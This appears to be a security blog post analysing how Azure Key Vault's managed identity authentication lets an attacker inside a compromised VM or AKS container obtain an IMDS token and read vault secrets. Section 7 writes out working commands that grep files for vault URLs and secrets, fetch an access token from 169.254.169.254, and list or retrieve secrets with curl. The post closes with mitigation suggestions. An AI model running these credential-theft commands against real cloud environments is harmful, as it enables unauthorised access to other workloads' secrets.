Hacking Azure Key Vault

7 min readNov 1, 2023

Exploring Authentication Problem

We will discuss about a security issue in Key Vault, specifically in the feature of managed identity authentication, and how It could allow an attacker in a container to access the secrets of all the containers in a certain node, in environments where this feature is in use.

Note: All information is for ethical purposes only.

1.The Secret Management Challenge
2. Azure Key Vault Role and Security Challenges
3. Azure’s Managed Identities for Authentication
4. Practical Implementation: Azure’s Authentication Solution
5. Understanding ManagedIdentityCredential() and Its Role in Key-Vault Authentication
6. Issues with the Authentication Solution
7. Attack vector- exploiting the mechanism
8. Secure Implementation Plan
9. References

1. The Secret Management Challenge

The issue of secret management is significant in the context of application security. The requirement for trustworthy and reliable authentication systems grows more and more important as applications become more linked and integrate with databases, services, and third-party components. However, there is still a critical issue that needs to be addressed: How can we successfully protect these login information and authentication credentials when faced with the rising risk of remote code execution (RCE) on the underlying virtual machines or containers?

Several solutions have been developed in response to this important problem, with HashiCorp Vault and Azure Key-Vault leading among them with a goal to prevent attackers from utilizing secrets in machines and protect sensitive information. In this research, we specifically pay attention to Azure Key-Vault, investigating its features and analyzing how it deals with the complex issue of secret management in the context of contemporary applications and cloud environments.

2. Azure Key-Vault Role and Security Challenges

A secret manager is a tool or service that helps securely store, and manage sensitive information, such as passwords, API keys, and certificates.

The issue often encountered with most secret management systems lies in the authentication process required to access these systems. Since secret managers are designed to prevent the unrestricted utilization of secrets on a machine, the use of an unprotected key on the same machine violates this fundamental security concept, potentially making it easier for attackers to access secrets.

Therefore, we’ve seen lately many methods for managing it securely. Azure Key Vault is a Microsoft Azure service that provides storage and management of cryptographic keys, secrets, and certificates, claims to provide secure way to manage it by providing an alternative to traditional key-based authentication through approach of “managed identities”.

3. Azure’s Managed Identities for Authentication

Azure Managed Identities is a feature that allows authentication for Azure resources, allowing them to access other Azure services without the need for explicit credentials.

The feature allows you to create an identity for your Azure resources such as Virtual Machines, Azure Functions, and App Service instances.
This managed identity is essentially a principal that represents the resource in Azure Active Directory (Azure AD)

Azure’s documentation:
“A common challenge for developers is the management of secrets, credentials, certificates, and keys used to secure communication between services. Managed identities eliminate the need for developers to manage these credentials.While developers can securely store the secrets in Azure Key Vault, services need a way to access Azure Key Vault. Managed identities provide an automatically managed identity in Azure Active Directory (Azure AD) for applications to use when connecting to resources that support Azure AD authentication.Applications can use managed identities to obtain Azure AD tokens without having to manage any credentials.”

4. Practical Implementation: Azure’s Authentication Solution

Based on Azure documentation, the secure way to implement the authentication is to use a code with libraries to retrieve secrets .

For the testing I’ve implemented it in Python which has two libraries of azure: “azure.identity” and “azure.keyvault.secrets” .
The code uses managed identity authentication to “Securely” connect vault and retrieve secrets.

Figure 1: Implementation in container architecture based on the documentation

Implementation in Python:

From azure.identity import ManagedIdentityCredential
From azure.keyvault.secrets import SecretClient

key_vault_url = " https://your-key-vault-name.vault.azure.net/"
secret_name = "your-secret-name"

credential = ManagedIdentityCredential()
secret_client = SecretClient(vault_url=key_vault_url, credential=credential)
retrieved_secret = secret_client.get_secret(secret_name)

5. Understanding ManagedIdentityCredential() and Its Role in Key-Vault Authentication

The ManagedIdentityCredential() is a function or class provided by the Azure SDK for Python (azure-identity) that facilitates authentication with Azure services using managed identities. It doesn’t require explicit credentials like client IDs and secrets to authenticate your application with Azure services. Instead, it leverages the managed identity associated with the Azure resource where your application is running.

After investigating, I found that the ManagedIdentityCredential() function retrieves a token from 169.254.169.254- the IP address of Azure IMDS.

Azure IMDS (Instance Metadata Service) is a RESTful endpoint that provides information about a virtual machine’s configuration and can be used for tasks like dynamic configuration and access to Azure services. It is accessible from within the virtual machine and provides metadata without the need for explicit credentials, thus it relies on the security of the underlying infrastructure. If an attacker gains access to the virtual machine, they may potentially access IMDS without authentication or credentials

IMDS retrieved a new managed identity token that was generated. Instead of storing a key to authenticate with Key-Vault, ManagedIdentityCredential() uses the managed identity token to authenticate with Key-Vault.

6. Issues with the Authentication Solution

The problem with this solution arises when an attacker gains access to the virtual machine. When using ManagedIdentityCredential() for authentication with Azure Key-Vault, it relies on Azure IMDS (Instance Metadata Service) to acquire a managed identity token without needing explicit credentials. This dependence on IMDS introduces a potential security concern. The attacker can exploit this access to authenticate with Key-Vault, granting them access to all stored secrets, compromising sensitive information security. Furthermore, in containerized environments like AKS or Docker, Azure IMDS remains unblocked by default, potentially allowing attackers to access the host’s Key-Vault, further amplifying the security risk

7. Attack vector- exploiting the mechanism

Figure 2: Utilizing Access, Attacker’s Perspective

Compromising Steps:

Discover the Vault URL and secret information, which is typically found within the code using managed identity or in environment variables:

find /path/to/search -type f -exec grep -H '.vault.azure.net' {} \;
find /path/to/search -type f -exec grep -H 'secret' {} \;

2. Get the Managed Identity Authentication Token:

Acquire the Managed Identity Authentication Token:

You can obtain a token by accessing the Managed Identity Authentication endpoint, which follows this format:

http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net

Use a tool or script to make a request to this endpoint and extract the access token:

token=$(curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" | jq -r .access_token)

3. Exploit the Token to Access Azure Key Vault:
Armed with the acquired token, an you can now authenticate with Azure Key Vault, gaining access to stored secrets.

Replace <vault-name> with the name of the KeyVault resource (gathered in step 1 or using IMDS information gathering).

Replace <secret-name>, or keep it blank to list all secrets.


access_token=$(curl -s -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://vault.azure.net" | jq -r .access_token)

curl -H "Authorization: Bearer $access_token" "https://<vault-name>.vault.azure.net/secrets/<secret-name>?api-version=7.1"
#Replace <secret-name> with the name of the secret, if you dont know the name keep it blank
#curl -H "Authorization: Bearer $access_token" "https://<vault-name>.vault.azure.net/secrets/?api-version=7.1"

This process allows any attacker with access to the compromised machine to authenticate with Key Vault and retrieve the stored secrets. It undermines the intended security of Azure’s solution, which was designed to provide a more secure alternative to authenticating with KeyVault compared to using traditional keys that could be exploited on the same machine.

Additionally, on AKS environmment this will allow accessing the secrets of all the containers of the same Node, some of them belong to different namespaces so it can be critical.

8. Secure Implementation Plan

To enhance security and protect Key-Vault authentication credentials, consider the following measures:

Utilize Key-Based Authentication with Vault:

Implement a secure key-based authentication mechanism to connect with Azure Key-Vault. This approach ensures that direct access to Key-Vault credentials is not required within the application code.

2. Implement Runtime key protection

Introduce runtime security mechanisms within your application to protect the key- can be done using key encryption or access control.

3. Consider using a third party solution or other services.

9. References

Azure role and challenges

“Azure Key Vault provides a way to securely store credentials and other keys and secrets, but your code needs to authenticate to Key Vault to retrieve them. Using a managed identity makes solving this problem simpler by giving Azure services an automatically managed identity in Azure AD”

key vault documentation — https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwimyd7dgI6BAxWJLOwKHUO_CucQFnoECA8QAw&url=https%3A%2F%2Flearn.microsoft.com%2Fen-us%2Fazure%2Fkey-vault%2Fgeneral%2Fbasic-concepts&usg=AOvVaw2WU7797-T09PAlxYOeCE8L&opi=89978449